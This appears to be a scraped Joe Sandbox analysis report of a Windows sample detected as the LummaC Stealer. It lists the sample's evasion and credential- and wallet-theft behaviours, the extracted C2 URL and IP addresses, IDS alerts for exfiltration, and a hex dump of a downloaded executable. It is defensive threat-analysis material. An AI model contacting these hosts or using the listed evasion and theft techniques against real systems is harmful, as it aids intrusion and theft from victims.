Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561691
MD5:1cf0d9bb6174853f764aaba59a7cd239
SHA1:39f4f9c5c7c3a38bd704d3e7e011b5cff63e35e8
SHA256:fb1dcb1d52ec39fefd8fc2311824d6795911709e8e16f42e0038ecfc68f49c4e
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1CF0D9BB6174853F764AABA59A7CD239)
    • chrome.exe (PID: 8180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 6952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1880,i,4249164096274677999,9181346475388211576,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 3132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1916,i,2138066403308314358,10443051361612717293,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1435855496.000000000138E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7416JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 7416JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T05:11:19.681078+010020283713Unknown Traffic192.168.2.749703104.21.33.116443TCP
          2024-11-24T05:11:21.730278+010020283713Unknown Traffic192.168.2.749705104.21.33.116443TCP
          2024-11-24T05:11:24.025707+010020283713Unknown Traffic192.168.2.749711104.21.33.116443TCP
          2024-11-24T05:11:26.247580+010020283713Unknown Traffic192.168.2.749717104.21.33.116443TCP
          2024-11-24T05:11:28.559552+010020283713Unknown Traffic192.168.2.749723104.21.33.116443TCP
          2024-11-24T05:11:31.081913+010020283713Unknown Traffic192.168.2.749729104.21.33.116443TCP
          2024-11-24T05:11:33.767751+010020283713Unknown Traffic192.168.2.749736104.21.33.116443TCP
          2024-11-24T05:11:39.218312+010020283713Unknown Traffic192.168.2.749756104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T05:11:20.382137+010020546531A Network Trojan was detected192.168.2.749703104.21.33.116443TCP
          2024-11-24T05:11:22.418578+010020546531A Network Trojan was detected192.168.2.749705104.21.33.116443TCP
          2024-11-24T05:11:39.949887+010020546531A Network Trojan was detected192.168.2.749756104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T05:11:20.382137+010020498361A Network Trojan was detected192.168.2.749703104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T05:11:22.418578+010020498121A Network Trojan was detected192.168.2.749705104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T05:11:41.413113+010020197142Potentially Bad Traffic192.168.2.749761185.215.113.1680TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T05:11:24.819017+010020480941Malware Command and Control Activity Detected192.168.2.749711104.21.33.116443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: file.exeAvira: detected
          Source: file.exe.7416.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
          Source: file.exeJoe Sandbox ML: detected
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.7:49816 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.7:49827 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49943 version: TLS 1.2
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1617339580.00000000084E0000.00000004.00001000.00020000.00000000.sdmp

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49703 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49711 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49756 -> 104.21.33.116:443
          Source: Malware configuration extractorURLs: https://property-imper.sbs/api
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 04:11:41 GMTContent-Type: application/octet-streamContent-Length: 2741760Last-Modified: Sun, 24 Nov 2024 04:06:45 GMTConnection: keep-aliveETag: "6742a655-29d600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 0e 25 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 76 62 6a 71 6d 70 75 00 80 29 00 00 a0 00 00 00 76 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 63 71 6b 63 79 69 77 00 20 00 00 00 20 2a 00 00 04 00 00 00 b0 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49711 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49736 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49756 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49717 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49729 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49761 -> 185.215.113.16:80
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=x+GKtrEwdR9nSl4&MD=2zgGtu86 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
